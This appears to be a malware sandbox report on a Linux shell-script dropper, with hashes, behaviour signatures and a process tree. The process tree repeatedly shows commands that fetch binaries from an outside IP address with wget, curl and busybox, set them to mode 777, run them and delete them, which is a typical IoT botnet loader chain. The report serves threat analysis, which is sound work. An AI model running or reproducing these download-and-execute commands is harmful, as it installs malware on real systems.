Analysis
max time kernel: 83s
max time network: 123s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 14-11-2024 02:43
Static task: static1
Behavioral task: behavioral1
Sample: 812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
Sample: 812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
Sample: 812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
Sample: 812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Resource: debian9-mipsel-20240611-en
General
Target: 812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh
Size: 10KB
MD5: 682075683081d9fc281b9f47dbc13513
SHA1: a2abfb0ba39a3deacc4cd4cc13539ae72b7e1ec9
SHA256: 812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618
SHA512: 7122fd7e2576ed1a72dc091536927c59e3e7c57c43165431b710449d59bd4df65913b942b8ce34d710d042d29c55c58cca994ca61be785e2f33a169412e0ee52
SSDEEP: 192:m/h372hBD3KaKVRcABDoKaKVR8LV/r37Z:5nD1ABDo/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information, which can indicate whether the system is a virtual machine.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh/tmp/812e12d6dad4d488f8b8d39147e247dbe6b94a9474f1f98f5c9962f115845618.sh1⤵PID:649
-
/bin/rm/bin/rm bins.sh2⤵PID:656
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:678
-
-
/bin/chmodchmod 777 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- File and Directory Permissions Modification
PID:682
-
-
/tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS./ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Executes dropped EXE
PID:683
-
-
/bin/rmrm ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:684
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:685
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:688
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:689
-
-
/bin/chmodchmod 777 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- File and Directory Permissions Modification
PID:690
-
-
/tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR./hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Executes dropped EXE
PID:691
-
-
/bin/rmrm hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:692
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:693
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:694
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:697
-
-
/bin/chmodchmod 777 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- File and Directory Permissions Modification
PID:701
-
-
/tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV./PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Executes dropped EXE
PID:702
-
-
/bin/rmrm PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:703
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:705
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:709
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:715
-
-
/bin/chmodchmod 777 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- File and Directory Permissions Modification
PID:718
-
-
/tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ./qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Executes dropped EXE
PID:719
-
-
/bin/rmrm qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:721
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:722
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:728
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:732
-
-
/bin/chmodchmod 777 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2./laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:738
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:739
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:755
-
-
/bin/chmodchmod 777 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj./1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:761
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:762
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:765
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:766
-
-
/bin/chmodchmod 777 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ./MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Executes dropped EXE
PID:770
-
-
/bin/rmrm MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:772
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:773
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:790
-
-
/bin/chmodchmod 777 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI./nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Executes dropped EXE
PID:797
-
-
/bin/rmrm nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:799
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:800
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:808
-
-
/bin/chmodchmod 777 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR./7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:811
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:812
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:817
-
-
/bin/chmodchmod 777 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM./gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:821
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:825
-
-
/bin/chmodchmod 777 qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1./qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:828
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:829
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:831
-
-
/bin/chmodchmod 777 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA./XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:834
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:835
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:837
-
-
/bin/chmodchmod 777 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy./eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:840
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:841
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:842
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:845
-
-
/bin/chmodchmod 777 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS./ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:848
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:849
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:851
-
-
/bin/chmodchmod 777 MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- File and Directory Permissions Modification
PID:852
-
-
/tmp/MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ./MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵
- Executes dropped EXE
PID:853
-
-
/bin/rmrm MMQLbm5hqTQLK9PCXst98DXZvFfDkoqaRJ2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:855
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:857
-
-
/bin/chmodchmod 777 nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI./nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm nQgsZEvlWmNpZnbdkbNl8EKKGKSbmEQgCI2⤵PID:860
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:861
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:863
-
-
/bin/chmodchmod 777 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR./7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm 7oHdTmuhrwAGzf483nB2yJEar3OZIKXiFR2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:871
-
-
/bin/chmodchmod 777 gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM./gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm gKXcUWSnaVAlkPeODets4f6GbEr74zFmNM2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:879
-
-
/bin/chmodchmod 777 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj./1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 1TyuXA68wzAXZHbn2Y6tk5ybtmNb4MFdpj2⤵PID:882
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:883
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:885
-
-
/bin/chmodchmod 777 qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/qOpad8fEABX2m6C2lykVUYrbhlTb579lU1./qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm qOpad8fEABX2m6C2lykVUYrbhlTb579lU12⤵PID:888
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:889
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:891
-
-
/bin/chmodchmod 777 XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA./XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm XeSlCkRjhDywGAQfziHeoondE5FGa7JIQA2⤵PID:894
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:895
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:897
-
-
/bin/chmodchmod 777 eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy./eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm eD0fgDs2st7uVEBTaK26HnlSqXGnXRqAHy2⤵PID:900
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:901
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:903
-
-
/bin/chmodchmod 777 ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS./ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm ebSlHNmXiUt0rZGXtAaNTYVqezAUMk2zPS2⤵PID:906
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:907
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:911
-
-
/bin/chmodchmod 777 ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS./ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm ODyDGOBy0jWfMj4rS70h0ABjZ9FrSyCPFS2⤵PID:914
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:915
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:917
-
-
/bin/chmodchmod 777 hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR./hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm hyyy8OoKdR2pnpfqESxX1UDf85WaIQxNRR2⤵PID:920
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:921
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:923
-
-
/bin/chmodchmod 777 PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV./PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm PjAvsQ34CXXz5AUPTxNP12dYB1c5U6QSlV2⤵PID:926
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:927
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:929
-
-
/bin/chmodchmod 777 qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ./qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm qxaXERN0MRSdtfT8ZxxQnAdIbxB2u09DdQ2⤵PID:932
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:933
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:934
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:935
-
-
/bin/chmodchmod 777 laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm2./laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm laiau4cN6ui4dUhdtLO7AszWQd9X2AFpm22⤵PID:938
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97